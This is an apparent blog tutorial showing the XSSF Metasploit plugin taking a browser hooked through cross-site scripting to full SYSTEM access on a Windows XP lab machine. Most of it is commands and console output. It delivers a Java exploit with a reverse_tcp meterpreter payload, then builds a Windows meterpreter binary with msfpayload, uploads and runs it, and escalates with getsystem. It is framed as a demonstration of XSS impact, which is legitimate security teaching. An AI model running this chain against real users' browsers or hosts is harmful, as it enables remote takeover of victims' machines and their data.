XSSF – From XSS to Root

The Cross-Site Scripting Framework Metasploit plugin can be used to demonstrate the impact of XSS and browser vulnerabilities.

XSSF isn’t officially part of the Metasploit Framework so you’ll need to download and install it manually.
It only takes a few minutes and everything you need to get started can be found on the Google code project page, code.google.com/p/xssf/

After installation XSSF can be ran from the Metasploit console.
This demonstration will show the steps required to get system access from a hooked victim.
In this case I will be targeting victim 2 who is using Internet Explorer 7 and an older version of Java on Windows XP.

Commands are in italics, notes are bolded.

Commands:

load xssf

//At this point I browsed to the XSSF test.html page to simulate hooked users.
xssf_victims

Victims
=======

ID SERVER_ID IP ACTIVE INTERVAL BROWSER_NAME BROWSER_VERSION COOKIE
— ——— — —— ——– ———— ————— ——
1 1 192.168.23.10 true 5 Google Chrome 28.0.1500.95 YES
2 1 192.168.23.12 true 5 Internet Explorer 7.0 YES

xssf_information 2

INFORMATION ABOUT VICTIM 2
============================
IP ADDRESS : 192.168.23.12
ACTIVE ? : TRUE
FIRST REQUEST : 2013-08-18 21:22:54
LAST REQUEST : 2013-08-18 21:24:54
CONNECTION TIME : 0hr 2min 0sec
BROWSER NAME : Internet Explorer
BROWSER VERSION : 7.0
OS NAME : Windows
OS VERSION : XP
ARCHITECTURE : ARCH_X86
LOCATION : http://192.168.23.200:8888
XSSF COOKIE ? : YES
RUNNING ATTACK : NONE
WAITING ATTACKS : 0

//From here we can incorporate Metasploit’s exploit modules. I’m choosing the java_atomicreferencearray module but a number of other modules may work just as well (or better) depending on what the target is vulnerable to.

use exploit/multi/browser/java_atomicreferencearray
set PAYLOAD java/meterpreter/reverse_tcp
set SRVHOST 192.168.23.200
set URIPATH xssf
set LHOST 192.168.23.200
exploit -j
jobs

Jobs
====

Id Name
— —-
0 Exploit: multi/browser/java_atomicreferencearray
//here you specify target victim and exploit job to be delivered.

xssf_exploit 2 0

[*] Searching Metasploit launched module with JobID = ‘0’…
[+] A running exploit exists: ‘Exploit: multi/browser/java_atomicreferencearray’
[*] Exploit execution started, press [CTRL + C] to stop it !

[+] Remaining victims to attack: [[1] (1)]

[+] Code ‘Exploit: multi/browser/java_atomicreferencearray’ sent to victim ‘2’
[+] Remaining victims to attack: NONE

[*] 192.168.23.200 java_atomicreferencearray – Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.23.200 java_atomicreferencearray – Generated jar to drop (5488 bytes).
[*] 192.168.23.200 java_atomicreferencearray – Sending jar
[*] 192.168.23.200 java_atomicreferencearray – Sending jar
[*] 192.168.23.200 java_atomicreferencearray – Sending jar
[*] 192.168.23.200 java_atomicreferencearray – Sending jar
[*] 192.168.23.200 java_atomicreferencearray – Sending jar
[*] 192.168.23.200 java_atomicreferencearray – Sending jar
[*] Sending stage (30355 bytes) to 192.168.23.12
[*] Meterpreter session 1 opened (192.168.23.200:4444 -> 192.168.23.12:3128) at 2013-08-18 21:45:23 -0200

show sessions

Active sessions
===============

Id Type Information Connection
— —- ———– ———-
1 meterpreter java/java victime @ Victim-PC 192.168.23.200:4444 -> 192.168.23.12:3128 (192.168.23.12)

//The Java meterpreter does not allow for getsystem so we’ll need to create a meterpreter binary to upload and execute. On Windows this needs to be run from the dev_shell system console :

ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.23.200 LPORT=5555 X > payload.exe

//Now back to the console. First set up the handler to run in the background:

use exploit/multi/handler
exploit -j

//Now that the listener is running return to the meterpreter session to upload and run the binary:

upload C:\\metasploit\\apps\\pro\\msf3\\payload.exe c:

//*I was unable to run execute -f so I brought up a shell and executed from there.

shell
cd c:\
C:\>payload.exe
payload.exe

//background this session so I can interact with the new fully functional meterpreter session

background
sessions -i 2
[*] Starting interaction with 2…

meterpreter > getuid
Server username: Victim-PC\victim
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM